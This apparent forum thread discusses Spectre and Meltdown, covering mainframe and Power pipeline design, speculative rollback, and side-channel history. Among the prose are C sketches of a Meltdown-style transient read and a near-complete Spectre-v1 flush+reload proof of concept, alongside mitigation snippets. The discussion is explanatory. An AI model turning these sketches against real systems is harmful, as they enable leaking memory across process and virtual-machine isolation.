Regarding your comments on mainframes: are you coming more from theory, or from working at a systems-engineer level on both that and, say, AS/400/Power? I ask to see whether this is a theoretical debate, albeit it does not really matter much since the vulnerability exists anyway.
It's theoretical, extended into a broader attempt at interpreting what has been done across multiple architectures in general.
I try to ground that in publicly available documentation or presentations, although those are less likely to exist for the more insular products, and for modern products in general.
From working with IBM, the focus in my experience was specifically virtualisation and the security around it, without the same level of flexibility and ease of use as, say, the AS/400. Virtualisation is integral to part of the context around the focus on security leakage across CPU, software, and memory; by the same theory you can build security around speculative execution, but at a cost to performance.
The Power series is more similar to the AS/400 than it is to the System Z architectures.
Virtualization implies some level of co-residency in shared hardware. That choice is a prerequisite for these exploits, and the increasing layers of checks in hardware and software are what motivated novel methods of inferring hidden information like timing attacks.
This is part of why I was taking a more theoretical angle, because of how impactful decisions made a decade or more ago in a wildly different security context can be.
There are elements to the implementation of a complex CISC architecture in models like the Z6, and its shared elements with Power6, that might have created pressure to defer checks outside of the streamlined critical loop, which would open a window for speculative side effects. However, doing so could have avoided more easily predicted problems, like bugs in natively supporting all the corner cases outside of the front-end and put-away stages.
The scalability and RAS features also run counter to security, since they tend to create new state that could be timed.
Power6's runahead mode interests me in terms of Meltdown, and its leveraging of the checkpoint stage for part of it. Since Nvidia's Meltdown-susceptible Denver has a similar runahead method, it might matter for the Power6 as well.
For Meltdown, it can come down to what stage or stages in the pipeline handle specific exceptions related to permissions. It's a long-standing and generally reasonable choice to defer a lot of it to the end of the pipeline.
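To make that concrete, here is a rough C sketch of the window that choice opens (hypothetical names, a susceptible core assumed, and the usual signal-handler recovery trick; it is an illustration of the mechanism, not a working exploit):

    #include <setjmp.h>
    #include <signal.h>
    #include <stdint.h>

    static uint8_t probe_lines[256 * 4096];   /* covert-channel buffer */
    static volatile uint8_t sink;
    static sigjmp_buf recover_point;

    static void on_segv(int sig)
    {
        (void)sig;
        siglongjmp(recover_point, 1);
    }

    /* Hypothetical transient read of one privileged byte: the access faults
     * architecturally, but if the permission check is only enforced at
     * retirement, the dependent load into probe_lines can execute first and
     * warm a secret-selected cache line that the fault does not undo. */
    static void transient_read(const volatile uint8_t *privileged_addr)
    {
        signal(SIGSEGV, on_segv);
        if (sigsetjmp(recover_point, 1) == 0)
            sink = probe_lines[(*privileged_addr) * 4096];
        /* execution resumes here after the fault; the byte would be
         * recovered by timing probe_lines, as in the next sketch */
    }

    int main(void)
    {
        /* placeholder address only; a real attempt iterates over a target mapping */
        transient_read((const volatile uint8_t *)0xffff888000000000ULL);
        return 0;
    }

The fault itself is architecturally precise, but if the permission check only bites at retirement, the dependent load has already run and left a footprint that the exception path cannot undo.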
Spectre and Meltdown have a dependence on when speculation occurs, and what needs to be covered by speculative rollback.
Essentially everyone past the advent of pipelines and caches reverts the IP, register state, flags, deferred stores, or any other state related to instruction semantics visible to the running thread.
I do not know of an architecture that ever made speculative rollback also restore the state of the cache hierarchy for non-modifying data movement, and given the constraints of the early processors that had pipelines + prediction + caches (1970s?), doing so would have negated the utility of having a cache in the first place.
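For illustration, here is a simplified Spectre-v1-style sketch in C (x86 intrinsics on GCC/Clang, hypothetical names and threshold, no retries or calibration, so it will not reliably leak as written) of exactly what rollback does and does not cover: the mispredicted bounds check is squashed and the registers come back, but the probe line warmed by the transient load stays warm and can be found with flush+reload timing.

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>
    #include <x86intrin.h>   /* _mm_clflush, _mm_lfence, __rdtscp */

    #define STRIDE 4096                       /* one probe slot per page */

    static unsigned array1_size = 16;
    static uint8_t array1[16];
    static uint8_t probe_lines[256 * STRIDE];
    static uint8_t temp;                      /* keeps the loads from being optimized away */

    /* Victim gadget: architecturally the bounds check always holds, but a
     * mistrained predictor lets the two dependent loads run transiently for
     * an out-of-bounds x, warming one probe line. */
    static void victim(size_t x)
    {
        if (x < array1_size)
            temp &= probe_lines[array1[x] * STRIDE];
    }

    /* Flush+reload: a fast reload means the line was touched transiently,
     * even though every register and flag was rolled back. */
    static int reload_is_fast(int guess)
    {
        unsigned aux;
        uint64_t t0 = __rdtscp(&aux);
        temp &= probe_lines[guess * STRIDE];
        uint64_t t1 = __rdtscp(&aux);
        return (t1 - t0) < 80;                /* threshold is machine-dependent */
    }

    int main(void)
    {
        const char *secret = "hypothetical";                 /* stand-in target */
        size_t evil_x = (size_t)(secret - (const char *)array1);

        memset(probe_lines, 1, sizeof(probe_lines));
        for (unsigned i = 0; i < 30; i++)                    /* train the branch in-bounds */
            victim(i % array1_size);
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe_lines[i * STRIDE]);
        _mm_clflush(&array1_size);                           /* slow the bounds check down */
        _mm_lfence();

        victim(evil_x);                                      /* mispredicted, then rolled back */

        for (int guess = 0; guess < 256; guess++)
            if (reload_is_fast(guess))
                printf("probe line %d is warm\n", guess);
        return 0;
    }

The page-sized stride just keeps the 256 probe slots on separate lines and away from the prefetchers; the 80-cycle threshold is a stand-in that would need calibrating per machine.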
The paper and some of the security experts are coming at this with the understanding that attack via this route has been a concept for years; it is not something new, which is why the paper frames the sentence as it does, along with what some of those researchers say in public.
This is the part I have questions about. I did not interpret that level of criticism from the Spectre paper, so I wanted clarification on which statements in the paper (or discussions outside of it) stated there was a purposeful reduction of security emphasis. I have seen some statements to that effect from some sources, though not usually from sources I'd assume had much visibility on the research or the vendors. For those involved in this research or in the design groups that allegedly chose to implement features they knew would compromise security, I would like to see their reasoning or recollection of events.
I would note that the paper is incomplete, given that it was finalized before we found out that Meltdown applies to the ARM A75, Intel, Power, Cavium, and Denver. There are suggestions that there may be news for Qualcomm's custom core and Fujitsu's SPARC variants.
My interpretation is that there's been an increasing set of security features and countermeasures being added over time onto the architectures, sometimes in reaction to new exploits becoming known. The elements used for Spectre and Meltdown predate nearly everything, and are almost first principles of processor design. It seems plausible to me that resources were heavily invested into new security measures and counter-exploits for attacks as the designers knew them, and they were placed on top of or used elements of those first principles, usually with significant delay due to architectural cycles (not cores or families, but bedrock architectural choices for CPU lines). It then turned out that the things that were grandfathered in were exploitable in a way that they hadn't anticipated.
The Spectre paper stated that these types of attacks were a new class of exploits, and from a meta standpoint the dates of the papers they cite can give some insight as to what was known and when.
There's a succession of papers dealing with side channel attacks, including electrical, branch, and cache timing.
Putting the electrical one aside (although dedicated crypto engines and software mitigations exist in part because of that research), the earliest branch exploits target specific, known algorithms such as SSL and AES implementations.
Assuming those were supposed to be taken into account by a new processor, nothing designed before 2009-2012 would have had a chance to do so. They all generally posited software mitigation; so long as the hardware functioned as they assumed, that would have been considered sufficient.
Cache timing goes back to 2003 in relation to DES, with algorithmic/software mitigation posited. Those mitigations have been long-deployed.
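For reference, the kind of algorithmic/software mitigation those papers posited looks roughly like this (a minimal sketch with a hypothetical S-box, not any particular library's code): sweep the whole table and mask, so the memory-access pattern no longer depends on the secret index.

    #include <stdint.h>

    /* Hypothetical 256-entry S-box; real DES/AES tables differ. */
    static const uint8_t sbox[256] = { 0 /* values elided */ };

    /* Constant-time lookup: sweep the whole table and mask, so the memory
     * access pattern (and cache footprint) is independent of the secret
     * index. Slower, but it removes the timing signal. */
    uint8_t ct_lookup(uint8_t secret_index)
    {
        uint8_t result = 0;
        for (unsigned i = 0; i < 256; i++) {
            /* mask is 0xFF only when i == secret_index, with no
             * secret-dependent branch */
            uint8_t mask = (uint8_t)-(uint8_t)(i == secret_index);
            result |= sbox[i] & mask;
        }
        return result;
    }

That trades a single lookup for 256 of them, which is the same performance-for-security trade-off mentioned above, just applied in software.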
The dates for when high-precision timers start showing up are more recent, and many of the old papers concerning key extraction weren't trying to escape any form of isolation.
The combination of timers, branch-prediction exploits, cache exploits, and the decision to shift focus from a target algorithm to the virtual memory system or the CPU pipeline itself didn't show up until more recently.
A significant hardware change for Spectre would be years out (a halt on forwarding, for Meltdown, may come faster). A more comprehensive architectural review would be something on the order of a new platform or a notable paradigm shift, like clean-sheet CPU architectures or a whole new mode.
Just that finally they have been successful, or more worryingly, it was successful years ago and has been exploited quietly by certain state organisations across the world.
So yes, one could say it was done purposefully, with a focus on performance over security.
It's possible that some nation-states or other large organizations had knowledge of this, although historically OS, software, IO, or explicit hardware errata would have been lower-hanging fruit. The big payoff and major use case impacted by these fixes--cloud services open to the internet running formerly internal services--is more recent.
I wouldn't rule out a lot of them not seeing this coming, though I suppose we'd need to ask some of those agencies if they isolated their kernel mappings to be sure.
Perhaps some of the leaked toolsets out there could be checked for LFENCE instructions or retpolines.
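For context, the sort of pattern one would grep for looks roughly like this in C (a sketch using Intel's LFENCE intrinsic; deployed mitigations lean more on index masking and retpoline thunks, but the idea is the same):

    #include <stddef.h>
    #include <stdint.h>
    #include <emmintrin.h>   /* _mm_lfence */

    /* Hypothetical hardened accessor: the LFENCE after the bounds check keeps
     * the dependent load from issuing under a mispredicted branch. */
    uint8_t read_element(const uint8_t *table, size_t index, size_t size)
    {
        if (index >= size)
            return 0;
        _mm_lfence();        /* speculation barrier */
        return table[index];
    }

Finding barriers like that, or retpoline-style indirect-branch thunks, in a toolset dated well before the disclosure would be telling.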
These attacks require local code execution or other forms of access to the machine. Up until recently, that was already considered to be game over with regard to a nation-state adversary. The legacy of the cloud is one where the world decided to do something that had been considered profoundly stupid from a security standpoint, and not for CPU performance reasons.